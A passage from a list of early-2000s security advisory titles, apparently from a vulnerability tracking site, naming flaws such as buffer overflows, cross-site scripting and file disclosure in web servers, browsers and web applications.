Denial of Service Conditions [1005414] Symantec Enterprise Firewall (Raptor Firewall) Secure Web Proxy Lets Remote Users Cause Denial of Service Conditions [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges [1005344] SurfControl SuperScout Bug in Web Reports Server Lets Remote Users Gain Control of the Application [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks [1005319] [Product May Not Be Vulnerable] CGI-Telnet Perl Script for Web Servers Discloses Password File to Remote Users [1005310] BEA Systems WebLogic Server and Express May Return a Response to the Wrong Remote User [1005305] EMU Webmail Input Validation Errors Disclose the Web Root Directory and Allow Cross-Site Scripting Attacks [1005303] Zope Web Application Server ZCatalog Index Access Control Bug Discloses Files to Remote Users [1005302] Zope Application Server Through the Web Code Input Validation Bug May Let Remote Users Shut Down the Server [1005297] acWEB HTTP Server Bugs Let Remote Users Crash the System and Permit Cross-Site Scripting Attacks [1005286] Web Server 4D May Disclose Passwords to Local Users [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions [1005276] phpWebSite Include Statement Bug Lets Remote Users Execute Arbitrary Code [1005275] Dino's WebServer Encoded-URL Input Validation Hole Lets Remote Users View Files on the System [1005272] Null httpd Web Server Heap Overflow Lets Remote Users Execute Arbitrary Code With Root Privileges [1005269] Compaq Web-based Enterprise Services (WEBES) Access Control Bug May Let Remote Users Access Privileged Files [1005262] Siemens DB4Web Application Server Lets Remote Users Initiate Arbitrary TCP Connections [1005259] IBM WebSphere Can Be Crashed By Remote Users Sending Large HTTP Headers [1005251] Internet Security Systems Internet Scanner Buffer Overflow in Parsing Web Responses May Let Remote Users Execute Arbitrary Code on the Scanner [1005245] Opera Web Browser Can Be Crashed By Remote Users With Certain Large Scale Image Tag Size [1005241] Siemens DB4Web Application Server Discloses Files on the System to Remote Users [1005240] PlanetWeb Web Server Buffer Overflow in Processing GET Requests Lets Remote Users Execute Arbitrary Code on the System [1005221] Lycos HTML Gear 'Guest Gear' Web Site Guestbook Input Validation Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks Against Guest Gear Users [1005220] Network Associates WebShield SMTP Virus Scanner Can Be Bypassed With Fragmented 'Partial' E-mail Messages [1005215] Mozilla Web Browser Privacy Leak May Disclose the Next Web URL You Visit to the Current Server [1005214] KDE Konqueror URL Decoding Inconsistency May Result in a Web Page Loading in the Incorrect Security Domain [1005212] Savant Web Server Buffer Overflow Allows Remote Users to Execute Arbitrary Code on the System [1005194] Web Server 4 Everyone Input Validation Flaw Discloses Files to Remote Users [1005182] Microsoft Internet Explorer URL Decoding Inconsistency May Result in a Web Page Loading in the Incorrect Security Domain [1005181] Aestiva HTML/OS Web Development Suite Input Validation Bug Lets Remote Users Conduct Cross-Site Scripting Attacks [1005167] NullLogic's Null httpd Web Server Input Validation Bug Lets Remote Users Conduct Cross-site Scripting Attacks [1005163] CGI Debugger Script Discloses Web Server Environment Variables to Remote Users [1005162] FactoSystem Web Publishing System Input Validation Bugs Let Remote Users Execute SQL Commands on the Underlying Database [1005154] SWServer Java Web Server Input Validation Hole Lets Remote Users View Files on the System Located Outside of the Document Directory [1005147] Webmin Default Configuration for Webmin RPC Security May Allow Remote Authenticated Users Gain Elevated Privileges in Certain Situations [1005137] OmniHTTPd Web Server Input Validation Holes in Sample Applications Let Remote Users Conduct Cross-Site Scripting Attacks [1005127] Microsoft Visual Studio .NET Web Projects May Disclose the Web Directory Structure to Remote Users [1005126] Abyss Web Server Access Control Bug Lets Remote Users Gain Administrative Control of the Web Server Application [1005089] WebEasyMail Possible Format String Hole Lets Remote Users Crash the SMTP Mail Service [1005083] Microsoft Internet Information Server (IIS) Web Server Fails to Properly Validate Client-side Certificates, Allowing Remote Users to Impersonate Other Users or Certificate Issuers [1005081] SteelArrow Web Application Server Buffer Overflows Let Remote Users Execute Arbitrary Code With System Level Privileges [1005064] IceWarp Web Mail Software Input Validation Hole in Address Book Lets Remote Users Conduct Cross-site Scripting Attacks [1005055] MyWebServer Has Buffer Overflow and Other Flaws That Can Be Exploited by Remote Users to Execute Arbitrary Code on the Server [1005052] GoAhead Web Server Buffer Overflow Lets Remote Users Execute Arbitrary Code on the System [1005048] Oracle Enterprise Manager Web Service Component of Oracle 9i Application Server Discloses the Web Cache Administrator Password to Local Users [1005043] b2 Weblog Has Multiple Holes That Let Remote Users Inject SQL Commands, Execute Commands on the System, and Conduct Cross-site Scripting Attacks [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions [1005001] Falcon Web Server Input Validation Holes Let Remote Users Conduct Cross-site Scripting Attacks Against Web Server Users [1005000] Sun iPlanet Web Server Buffer Overflow in Encoded Transfer Chunk Processing Allows Remote Users to Execute Arbitrary Code With Root Privileges [1004971] Xitami Web Server Can Be Crashed By Remote Users Opening Multiple Concurrent Sessions [1004969] Web Shop Manager Input Validation Bug Lets Remote Users Execute Commands on the System [1004962] Opera Web Browser Input Validation Flaw in FTP View Feature May Let Remote Users Conduct Cross-Site Scripting Attacks [1004961] Mozilla Web Browser Input Validation Flaw in FTP View Feature May Let Remote Users Conduct Cross-Site Scripting Attacks [1004957] Jana Web Server Buffer Overflow in Processing HTTP Commands May Let Remote Users Execute Arbitrary Code on the System [1004953] 602Pro LAN Suite Web Server and Telnet Proxy Bugs Let Remote Users Consume All Available Memory on the System [1004938] Ensim WEBpliance Server Management Software Lets Remote Authenticated Users Receive E-mail for Other Users on the Hosted Domain [1004918] 'Gallery' Web-based Image Gallery Software Input Validation Flaw Lets Remote Users Execute Arbitrary Commands on the System [1004899] IPswitch IMail Web Calendaring Service Can Be Crashed By Remote Users Sending a Malformed Request [1004893] eUpload CGI Web-based File Upload Utility Access Control Flaw Discloses User Passwords to Remote Users [1004887] ShoutBOX Web Comment System Lets Remote Users Cause Arbitrary Scripting Code to Be Executed By Site Visitors [1004878] Mozilla Web Browser JavaScript 'Same Origin Policy' Flaw Allows Remote Users to Create Malicious JavaScript to Retrieve Web Data from a Victim's Internal Network [1004877] Microsoft Internet Explorer (IE) Web Browser JavaScript 'Same Origin Policy' Flaw Allows Remote Users to Create Malicious JavaScript to Retrieve Web Data from a Victim's Internal Network [1004870] Aprelium's Abyss Web Server Discloses Directory Contents to Remote Users [1004852] Confixx Service Provider Customer Management Interface May Let Remote Users Execute Arbitrary Commands on the System [1004851] Ipswitch IMail Server Buffer Overflow in Web Messaging Daemon Lets Remote Users Execute Arbitrary Code and Gain System Level Access [1004842] StatsPlus Web Server Statistics Package Allows Remote Users to Inject Arbitrary Script Commands into the Statistics Log and Conduct Cross-site Scripting Attacks [1004840] ezContents Web Content Management System Contains Multiple Flaws That Allow Remote Users to Create or Delete Directories and Inject SQL Commands and Allow Remote Authenticated Users to View Files on the System [1004839] Mozilla Web Browser Allows Javascript Code to Read and Modify Cookies from Other Domains [1004808] Working Resources BadBlue Web Server Uses Weak Administrator Authentication Method That May Allow Remote Users to Execute Arbitrary Commands on the System [1004806] BadBlue File Sharing Web Server File Path Input Validation Bug Lets Remote Users Conduct Cross-Site Scripting Attacks Against BadBlue Users [1004801] Geeklog Weblog Software Input Filtering Bug in 'Stories' and 'Comments' Lets Remote Users Conduct Cross-site Scripting Attacks [1004799] Fastlink Software 'TheServer' Web Server Access Bug May Let Remote Users View Log File Access Passwords [1004798] World Wide Web Offline Explorer (WWWOFFLE) Proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code on the System [1004792] Caucho Resin Web Server Discloses Physical Path of Web Root Directory to Remote Users [1004789] W3C Jigsaw Web Server Bugs in Processing Device Requests Let Remote Users Crash the Web Service and Determine the Web Root Directory Path [1004773] BadBlue Web Server Can Be Crashed By Remote Users Sending Invalid Requests, Discloses Passwords to Local Users, and May Disclose Passwords and Files to Remote Users [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users [1004769] Northern Solutions Xeneo Web Server (aka WebMan Server) Lack of Input Validation Lets Remote Users View Files on the System [1004765] Hosting Controller Web Hosting Software Access Control Hole Allows Remote Authorized Users to Change Other User Passwords [1004761] Microsoft Foundation Classes (MFC) Information Server Application Programming Interface (ISAPI) 'mfc42.dll' Contains Buffer Overflows That Can Crash the System or Possibly Allow for the Remote Execution of Arbitrary Code [1004759] ATPhttpd Web Server Buffer Overflows Let Remote Users Execute Arbitrary Code on the Server [1004754] IBM DCE Distributed File System (DFS) Web Secure Relative Path Bug Lets Local Users Execute Arbitrary Code on the System With the Privileges of the Web Server [1004751] Lil' HTTP Server 'pbcgi.cgi' Script Input Validation Flaw Allows Remote Users to Conduct Cross-site Scripting Attacks Against Web Server Users [1004749] IBM AIX System Management Interface Tool (SMIT) Path Input Validation Flaw Lets Remote Authorized Users Execute Arbitary Binaries on the System [1004737] GoAhead Web Server Input Validation Bugs Disclose Files on the System to Remote Users and Also Permit Cross-Site Scripting Attacks [1004731] iPlanet Web Server Input Validation Bug in Search Function Discloses Files on the System to Remote Users [1004730] iPlanet Web Server Buffer Overflow in Search Function Lets Remote Users Execute Arbitrary Code on the Server [1004728] BadBlue Web Server Input Validation Flaw in cleanSearchString() Function Lets Remote Users Conduct Cross-Site Scripting Attacks Against BadBlue Users [1004726] MyWebServer Buffer Overflow in Processing GET Requests Lets Remote Users Execute Arbitrary Code on the System [1004723] KF Web Server Discloses Directory Listings for All Web Directory Contents to Remote Users [1004704] Squid Proxy Cache Has Buffer Overflows in Processing Gopher and FTP Data and May Incorrectly Forward Proxy Authentication Credentials to Remote Web Sites [1004702] BEA WebLogic Server Race Condition May Let Remote Users Crash the Server [1004699] Noguska's NOLA Web-based Accounting and Inventory Management Package Lets Remote Users Upload and Execute PHP Code [1004694] Lotus Domino Web Server R4 May Disclose Files in the Web Root Directory to Remote Users Via URL Requests Ending With a Question Mark [1004672] OmniHTTPd Web Server Bug in Processing Long HTTP Protocol Parameters Allows Remote Users to Crash the Web Service [1004664] WatchGuard Firebox SOHO Default Configuration May Facilitate Brute Force Password Guessing Attacks on the Internal Interface [1004656] Macromedia JRun Web Application Server Dot URL Bug Discloses Server Files to Remote Users [1004653] Pramati Server Java Web Application Server Dot URL Bug Discloses Server Files to Remote Users [1004651] Sybase EAServer Java Web Application Server Dot URL Bug Discloses Server Files to Remote Users [1004646] ColdFusion MX Buffer Overflow When Used With Microsoft Internet Information Server (IIS) Lets Remote Users Crash the IIS Web Server or Execute Arbitrary Code [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code [1004630] Caucho Resin 'HelloServlet' Example Code Discloses Web Directory Path to Remote Users [1004617] Verity Search97 Search Engine Input Validation Flaw Lets Remote Users Conduct Cross-site Scripting Attacks Against Users of Web Sites Running Search97 [1004611] AdvServer Web Server Can Be Crashed By Remote Users Sending a Single CR/LF Sequence [1004608] BEA WebLogic Server Lets Remote Users Bypass Access Controls to Access Protected Web Pages By Using Forward Slashes in URLs [1004581] 4D Web Server Buffer Overflow in Processing Long HTTP Requests May Let Remote Users Execute Arbitrary Code or Crash the Service [1004568] WebBBS Bulletin Board Input Validation Flaw in 'webbbs_post.pl' Allows Remote Users to Execute Arbitrary System Commands [1004559] NETGEAR Web Safe Router Default Configuration May Let Remote Users Gain Administrative Access to the Device [1004558] webMathematica Input Validation Error Discloses Arbitrary Files on the System to Remote Users [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server [1004553] Zeroboard Web Forum Software Lets Remote Users Execute Arbitrary PHP on the Server [1004552] Resin Web Server Discloses Files on the System to Remote Users and Allows Remote Users to Crash the Server [1004549] Cgiemail Web Mail System May Let Remote Users Relay Mail Via the System [1004543] Xitami Web Server GSL Templates Contain Unspecified Security Flaw [1004532] Active! mail Web-based E-mail System Will Pass Scripts Embedded Within the Header to Be Executed on the Recipient's Web Browser [1004531] AnalogX SimpleServer:WWW Web Server Can Be Crashed By Remote Users [1004516] csNews Web-News CGI Script Access Control Flaws Let Remote Users View Sensitive Data, Including User Passwords, Modify Administrative Settings, and Execute Commands on the Server [1004511] AlienForm2 CGI Script For Mailing Web Form Data Discloses Files to Remote Users and Lets Remote Users Write to Arbitrary Files [1004510] Mozilla Web Browser Bug in Processing Stylesheets May Let Remote Users Crash the Browser [1004507] Twibright Labs' Links Web Browser May Execute Arbitrary Code When Viewing Malformed PNG Images [1004499] Geeklog Web Portal Software Permits Cross-Site Scripting Attacks and May Allow Remote Users to Execute Arbitrary SQL Commands on the Database Server [1004494] W-Agora Web Forum Software Lets Remote Users Execute Arbitrary PHP Code on the Server [1004492] SEANOX's Devwex Web Server Discloses Files Located Outside of the Web Root Directory to Remote Users and Allows Remote Users to Crash the Web Server [1004491] php(Reactor) Web Site Software Allows Remote Users to Conduct Cross-Site Scripting Attacks to Steal Authentication Cookies [1004487] Splatt Forum Web Bulletin Board Input Validation Flaw in Filtering Image Tags Lets Remote Users Conduct Cross-Site Scripting Attacks to Steal Other Users' Authentication Cookies [1004445] TeeKai's Tracking Online PHP Script for Tracking Web Site Users Contains Cross-Site Scripting Flaws, Allowing Remote Users to Steal Another User's Authentication Cookies [1004442] BadBlue Web Server Has Input Validation Flaw That Lets Remote Users View Directory Contents [1004426] Shambala Server Discloses Clear Text Passwords to Authenticated Remote Users Via FTP and Also Lets Remote Users Crash the Web Server [1004401] Novell NetWare Enterprise Web Server Default Files Disclose Server Information to Remote Users [1004385] Opera Web Browser Allows Malicious Servers to Silently Retrive Files from the Victim's System [1004381] BlueFace's Falcon Web Server Lets Remote Users Access Password-Protected Files [1004370] Cisco Intrusion Detection System (IDS) Device Manager Bug in Web Access Feature Lets Remote Users View Files on the Sensors [1004366] LocalWEB2000 Web Server Discloses Password-Protected Files to Remote Users [1004365] Pharao Web Portal Software Has Multiple Flaws That Allow Remote Users to Access the System as Any User and to Read Files on the Server [1004354] New Atlanta Communications ServletExec/ISAPI Java Server Can Be Crashed By Remote Users and Discloses the Directory Path and Files in the Web Root Directory to Remote Users [1004350] Deerfield WebSite Pro Windows-based Web Server May Disclose CGI Source Code to Remote Users in Certain Cases [1004337] Red Hat Stronghold Secure Web Server Sample Script ('swish') Discloses Installation Path to Remote Users [1004336] Xitami Web Server Flaw in Processing Errors May Allow Remote Users to View CGI Source Code [1004334] BannerWheel CGI-based Banner Display Management Software Buffer Overflows May Let Remote Users Execute Arbitrary Code Via the Management Interface [1004319] Hosting Controller Software for Web Hosting Companies Has Input Validation Errors in 'dsnmanager.asp' and 'imp_rootdir.asp' Scripts That Allow Remote Users to View Files on the System and Upload and Copy Files With Administrator Privileges [1004287] NOCC PHP-based Webmail Client Software Displays Message Text as HTML Without Filtering, Allowing a Remote User to Access the Victim's Mailbox Using a Cross-Site Scripting Attack [1004284] NetWin DNews News Server Has Unspecified 'Security Fault' That May Allow Remote Users to Access the Management Interface [1004282] mnoGoSearch SQL-based Search Engine Software Has Heap Overflow That Lets Remote Users Execute Arbitrary Code with the Privileges of the Web Server [1004278] BEA Systems WebLogic Server and Express May Disclose an Administrative Password to Local Users [1004277] BEA Systems WebLogic Server Default Management Servlet Discloses the Contents of Files in Certain Subdirectories to Remote Users [1004276] Critical Path inJoin Directory Server 'iCon' Management Interface Allows Cross-Site Scripting Attacks Against Administrators [1004260] Webmin Session ID Spoofing Hole May Allow Remote Users to Gain Root Access to the System [1004257] Ecometry's SGDynamo Web Application Engine Allows Remote Users to Conduct Cross-Site Scripting Attacks [1004246] Webmin User Management Tool May Allow Cross-Site Scripting Attacks [1004237] HP-UX Virtualvault iPlanet Web Server May Allow Remote Connections to the Administration Server [1004236] L.Y.S.I.A.S. Lidik Web Server for Microsoft Windows Systems Lets Remote Users View Files Located Anywhere on the Partition [1004223] b2 Weblog Software Uses Relative Include Path That Allows Remote Users to Execute Arbitrary Shell Commands on the System [1004219] Webglimpse Search Engine Filtering Flaw May Allow Remote Users to Conduct Cross-Site Scripting Attacks Against Users of Sites Running Webglimpse [1004211] 4D Web Server Buffer Overflow in Processing Basic HTTP Authentication Lets Remote Users Crash the Server and May Allow Arbitrary Code to Be Executed [1004184] CIDER Project's SHADOW Intrusion Detection Software Allows Remote Users to Execute Arbitrary Code on the Server with Web Server Privileges [1004182] BEA Weblogic URL Parsing Flaw Lets Remote Users View .JSP Source Code or the Physical Installation Path and Cause Denial of Service Conditions [1004123] Lil' HTTP Server Discloses Files Located Outside of the Web Document Directory to Remote Users and Allows Remote Users to Conduct Cross-site Scripting Attacks Against Administrators [1004122] vqServer Java-based Web Server Sample CGI Script Allows Cross-Site Scripting Attacks [1004121] Microsoft Internet Explorer Web Browser Can Be Crashed By Remote Users With OLE OBJECT Element Dependency Loops [1004092] Talentsoft Web+ Buffer Overflow in Processing Cookies Lets Remote Users Execute Arbitrary Code With SYSTEM Privileges [1004090] Microsoft Back Office Web Administration Authentication Mechanism Can Be Bypassed By Remote Users [1004089] WebTrends Reporting Center Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code with SYSTEM Privileges [1004054] Macromedia ColdFusion Web Application Server Allows Remote Users to Conduct Cross-Site Scripting Attacks to Steal Authentication Cookies [1004052] IBM Lotus Domino Web Server Buffer Overflow During Authentication May Let Remote Users Crash the Web Server [1004037] Webalizer Buffer Overflow Allows Remote Users to Execute Arbitrary Code on the Server via Reverse DNS Lookups [1004036] StepWeb Search (SWS) Perl-based Search Engine Inadequate Access Controls Lets Remote Users Gain Administrative Access to the Search Engine [1004033] Multiple Vulnerabilities in IBM Informix Web DataBlade Let Remote Users Execute SQL Commands on the Server [1004032] Microsoft Internet Information Server (IIS) FTP STAT Command Bug Lets Remote Users Crash Both the FTP and the Web Services [1004031] Microsoft Internet Information Server (IIS) URL Length Bug Lets Remote Users Crash the Web Service [1004030] NetWare Web Search Server User Input Filtering Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks [1004011] Microsoft Internet Information Server (IIS) Buffer Overflow in ASP Server-Side Include Function May Let Remote Users Execute Arbitrary Code on the Web Server [1004009] Abyss Web Server Discloses Web Server Password File to Remote Users [1004002] Microsoft Office Web Components Let Remote Users Determine if Specified Files Exist on Another User's Host [1004001] Microsoft Office Web Components Let Remote Users Gain Full Read and Write Control Over Another User's Clipboard, Even if Clipboard Access Via Scripts is Disabled [1004000] Microsoft Office Web Components Let Remote Users Write Code to Run in the Victim's Local Security Domain and Access Local or Remote Files [1003999] Microsoft Office Web Components in Office XP Lets Remote Users Cause Malicious Scripting to Be Executed By Another User's Browser Even If Scripting is Disabled [1003984] EMU Webmail Server Discloses Files on the Server to Remote Users [1003969] Quik-Serv Web Server Discloses Arbitrary Files to Remote Users [1003944] IBM Lotus Domino Server Discloses Installation Path of Web Root Directory to Remote Users Requesting DOS Devices [1003922] Microsoft Outlook Web Access With SecurID Authentication May Allow Remote Users to Avoid the SecurID Authentication in Certain Cases [1003912] Citrix NFuse Publishing Server Lets Remote Authenticated Users View Files Located Outside of the Web Root Directory [1003910] Analog Web Log File Analysis Tool Allows Cross-Site Scripting Attacks [1003908] Citrix NFuse Web Publishing Server Sample Pages Allow Cross-Site Scripting Attacks [1003894] Instant Web Mail PHP-based Mail Client May Let Remote Users Cause Arbitrary POP Commands to Be Executed on Another User's Mail System [1003892] WebSight Directory System Allows Remote Users to Conduct Cross-Site Scripting Attacks Against Directory Users [1003891] AlGuest Web-based Guestbook Lets Remote Users Access the Guestbook With Administrator Privileges [1003879] Built-In Guestbook Stand-Alone Module (Big Sam) Lets Remote Users Consume CPU Resources or Determine the Web Root Installation Path [1003875] HP Webproxy for HP-UX VVOS Operating System May Forward Certain HTTP Requests to the Internal Network Without Fully Processing the Packet Against the Rule Set [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System [1003863] Webmin System Management Tool Lets Local Users Determine the Root User's Webmin Session ID and Gain Webmin Access as the Root User [1003857] ARSC Really Simple Chat Server Discloses Web Root Directory Location to Remote Users [1003853] Hosting Controller Web Hosting Software ASP Script Validation Bugs Let Remote Users Edit and Delete Any Files on the System, Giving the Remote Users Full Control of the System [1003846] Sun Java Web Start Bug in Java Networking Launching Protocol (JNLP) Lets Remote Users Create Unsigned Applets That Can Access Restricted Resources [1003829] Oblix NetPoint Web Access Control System Account Lockout Feature Fails to Lockout Repeated Incorrect Authentication Attempts [1003822] Foundry Networks ServerIron Web Filtering Rules Can Be Bypassed By Remote Users [1003819] Black Tie Project Web Portal Software Discloses Web Document Directory Installation Path to Remote Users [1003815] TalentSoft Web+ Application Server Buffer Overflow Gives Remote Users SYSTEM Level Access to the Server [1003809] PHP FirstPost Weblog Discloses Web Installation Directory to Remote Users [1003808] ZyXEL ZyWALL Security Gateway ARP Processing Bug Lets Users on the Local Network Cause the Security Gateway's Interface to Go Down [1003784] Pi3Web Web Server Discloses Protected Files within the System Web Document Directory to Remote Users [1003778] Cobalt XTR User Interface Access Control Issue and File Uploading Authentication Bug Let Local Users Write to Files with Root Privileges [1003768] Xerver Web Server Input Validation Flaw Lets Remote Users View Files on the Server and Error Handling Bug Lets Remote Users Crash the Web Service [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges [1003756] Microsoft Internet Information Server 4.0 .HTR Web Application Lets Users Change Their Passwords When the NT Security Policy is Configured to Prohibit Password Changing [1003748] Endymion's Sake Mail Web Mail Java Servet Lets Remote Users View Files on the Server [1003747] Endymion's MailMan Web Mail Server Lets Remote Users View Files on the Server [1003746] Talentsoft Web+ Application Server Lets Remote Users Execute Arbitrary Code with System Level Privileges [1003743] Thttpd Web Server Filtering Flaw Lets Remote Users Steal Cookies Via Cross-Site Scripting Attacks [1003740] Zope Web Application Content Server Proxy Role Error May Let Users Access Unauthorized Objects [1003734] Draytek Vigor DSL Router Leaves Undocumented Management Port Open on the External (Internet-side) Interface [1003732] Netscape Web Broswer Java Environment Lets Remote Malicious Applets Redirect Web Proxy Connections [1003731] Sun Java Runtime Environment (JRE) Lets Remote Malicious Applets Redirect Web Proxy Connections [1003730] Microsoft Java Virtual Machine in Internet Explorer Lets Remote Malicious Applets Redirect Web Proxy Connections [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users [1003722] AeroMail Web Mail System Lets Remote Users Steal the Cookies of AeroMail Users and Lets Valid Remote Users Access Files on the AeroMail Server [1003689] Internet Explorer (IE) Web Browser 'innerHTML' Property Hole Lets Remote Users Execute Programs on the Browser's Host, Even With ActiveX and Active Scripting Disabled [1003683] Novell GroupWise Server Discloses Web Installation Path to Remote Users [1003680] Worldgroup Software (FTP and Web Server) Buffer Overflows Let Remote Users Crash the FTP and Web Services and May Allow for Remote Code Execution [1003676] PHP File Upload Bugs Let Remote Users Execute Arbitrary Code on a PHP-enabled Web Server [1003668] BadBlue Web Server Lets Remote Users Traverse the Directory and View Files Located Anywhere on the System [1003666] BadBlue Web Server Allows Remote Users to Conduct Cross Site Scripting Attacks and Run (and Propagate) Arbitrary Code on BadBlue File Sharing Servers [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users [1003657] ScriptEase Web Server Edition Sample Script (comment2.jse) Discloses Files Located Anywhere on the Server to Remote Users [1003651] Citrix NFuse Web Publishing Server May Disclose Novell Directory Services (NDS) Network Information to Remote Users [1003648] Greymatter Weblog Software Discloses Administrator Account Passwords to Remote Users in Certain Configurations [1003632] NetWin's WebNEWS Server Has Built-in Default User Names That Cannot Be Removed and That Allow Remote Users to Gain Access [1003631] Essentia Web Server Discloses Files Located Anywhere on the System to Remote Users and Lets Remote Users Crash the Web Service [1003624] Avenger's News System CGI (ans.pl) Input Filtering Hole Lets Remote Users Execute Arbitrary Commands on the Web Server [1003613] Lil' HTTP Server Discloses Files in Password Protected Directories on the Web Server to Remote Users [1003606] Slash Code Allows Remote Users to Conduct Cross-Site Scripting Attacks to Steal Slash Web Site User Cookies [1003603] Netwin's WebNEWS News Server CGI May Execute Arbitrary Code Supplied By Remote Users [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions [1003598] ScriptEase Mini WebServer Can Be Crashed By Remote Users Sending Long HTTP Requests [1003597] Microsoft Outlook Web Access Discloses 'Include' Archive Files in the 'lib' Directory to Remote Users [1003588] Winamp Media Player Discloses Temporary File Path to Remote Web Servers, Potentially Allowing a Remote Server to Execute Arbitrary Code on the User's PC [1003584] Dino's WebServer Can Be Crashed By Remote Users Sending Multiple Long HTTP GET Requests [1003581] Deerfield WebSite Web Server Software Discloses Installation Path Location to Remote Users [1003578] Phusion Web Server Has Multiple Flaws That Let Remote Users View Files, Crash the Server, and Execute Commands and Code to Gain System Level Access [1003576] Powie's PHP Forum (PFORUM) Web Board Authentication Flaw Lets Remote Users Login as Any Other User [1003573] Hyper Nikki System Web Diary Software Allows Cross-Site Scripting Attacks [1003570] Lasso Web Data Engine May Allow Remote Users to Crash the Web Server [1003567] DCP-Portal Web Content Management Software Allows Cross-Site Scripting Attacks [1003566] DCP-Portal Web Site Content Management Software Discloses Web Root Installation Path to Remote Users [1003559] PrivaSec SurfSecure Web Privacy Software Fails to Block Spyware and Leaks Visited URLs to Remote Web Sites [1003553] DansGuardian Web Content Filtering Proxy Bug Lets Remote Users Bypass File Name Extension Filtering Restrictions [1003549] ForumPerso PHP-based Web Forum Lets Remote Users Gain Administrator Access to the Application [1003542] SIPS Weblog Input Validation Hole Lets Remote Users Obtain Administrator Status on the Web Site [1003541] Opera Web Browser MIME Flaw Causes 'text/plain' Pages to Be Displayed as HTML and Any Embedded Scripting to Be Executed By the Browser [1003539] Falcon Web Server URL Parsing Bug Discloses Files in Protected Directories to Remote Users Without Requiring Authentication [1003538] NetWin CWMail Web-Mail Server Buffer Overflow Lets Remote Users Execute Arbitrary Code on the System With the Privileges of the IIS Web Server [1003522] PHPWebThings Web Page Creation Tool May Allow Remote Users to Modify SQL Queries [1003516] Microsoft Internet Explorer (IE) Web Browser Has New Frame Domain Verification Bug That Lets Remote Users Obtain Files from Another User's Local File System [1003506] CGINews Web-based News Management Application Discloses Files on the System to Remote Users [1003503] BAVO PHP-based Web News Software Authentication Bug Lets Remote Users Gain Administrative Access to the Application [1003501] '2037 Gestion Liens' Web Portal Software Lets Remote Users Gain Administrative Access to the Application [1003498] Sitenews PHP-Based Web News System Lets Remote Users Add User Accounts [1003495] IceWarp Web Mail Lets Remote Users Steal User Session IDs and Access Mail Accounts Belonging to Other Users [1003466] Opera Web Browser Allows Cross-site Scripting Attacks Via Non-HTTP Servers [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests [1003463] eshare Expressions Web Site Software Discloses Files on the Hard Drive to Remote Users [1003462] Microsoft Internet Explorer Web Browser Allows Cross-site Scripting Attacks Via Non-HTTP Servers [1003456] WWWeBBB Web-based Bulletin Board Discloses Files on the System to Remote Users [1003434] Microsoft ASP.NET Web Application Framework Allows Cross Site Scritping Attacks and Discloses Path Information to Remote Users [1003431] IBM Lotus Domino Web Server Can Be Crashed By Remote Users Requesting DOS Devices in a Certain Manner [1003430] Portix-PHP Web Portal Software Discloses Files to Remote Users and Lets Remote Users Gain Administrator Access on the Portal Application [1003428] Lotus Domino Web Server Gives Access to Password-Protected Functions to Unauthorized Remote Users Via Malformed URLs [1003421] NetScreen Firewalls Can Be Made Unresponsive By a Remote User on the Trusted Interface Side Conducting Port Scans Through the Firewall [1003417] Lotus Domino Web Server Discloses User Account Validity Information to Remote Users [1003411] NETGEAR Router Web Content Filtering Mechanism Can Be Bypassed By Remote Users With Certain Malformed HTTP GET Requests [1003383] Hosting Controller Web Hosting Management Application Discloses Information About Valid User Account Names and Allows Brute Force Username and Password Guessing Attacks [1003376] Ganglia Clustering Environment Web Client Lets Remote Users Execute Arbitrary Commands on the Server [1003374] XOOPS Object-Oriented Web Portal Software Lets Remote Users Inject SQL Commands that Will Be Executed By the Underlying SQL Database [1003368] AHG's 'search.cgi' Search Engine Input Validation Flaw Lets Remote Users Execute Arbitrary Commands on the Web Server [1003358] SquirrelMail Web-based Mail Server Lets Remote Users Execute Arbitrary Code on the Server [1003357] FormMail.pl Web-to-Email CGI Script Still Allows Unauthorized Users to Send Mail Anonymously (e.g., Send Spam) [1003350] Tarantella Enterprise Server 'ttawebtop.cgi' Bug Discloses Files and Directories to Remote Users [1003346] W3Perl Web Server Statistics Package Allows a Remote User to Cause Arbitrary Javascript to Be Executed When the Package is Used [1003329] Caldera 'scoadminreg.cgi' Component of UnixWare Webtop Lets Local Users Execute Arbitrary Code with Root Privileges to Gain Root Access [1003324] Netscape Web Browser Cookie Processing Bug May Let Remote Web Sites Steal a User's Cookies for Any Domain [1003323] Mozilla Web Browser Cookie Processing Bug May Let Remote Web Sites Steal a User's Cookies for Any Domain [1003322] Citrix NFuse Web Publishing Server Discloses List of Published Applications to Remote Users [1003321] Cyberstop Web Server Can Be Crashed By Remote Users Sending URL Requests for MS-DOS Devices [1003320] Comprehensive Web Programming API (CwpApi) May Disclose Files Located Outside of the Web Root Directory to Remote Users [1003309] CGI Online Worldweb Shopping (COWS) E-Commerce System Discloses User Information and Order Data to Remote Users and Also Permits Cross-site Scripting Attacks [1003291] Hellbent Java-based Web Server May Disclose Configuration Information to Remote Users In Certain Situations [1003282] Avirt Gateway Web Proxy Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server with SYSTEM Level Privileges [1003256] My Calendar Perl-based Web Calendar Flaw Allows Remote Users to Execute Arbitrary Code on the Web Server [1003255] My Classifieds On-line Classified Advertising Script Has Flaw That Allows Remote Users to 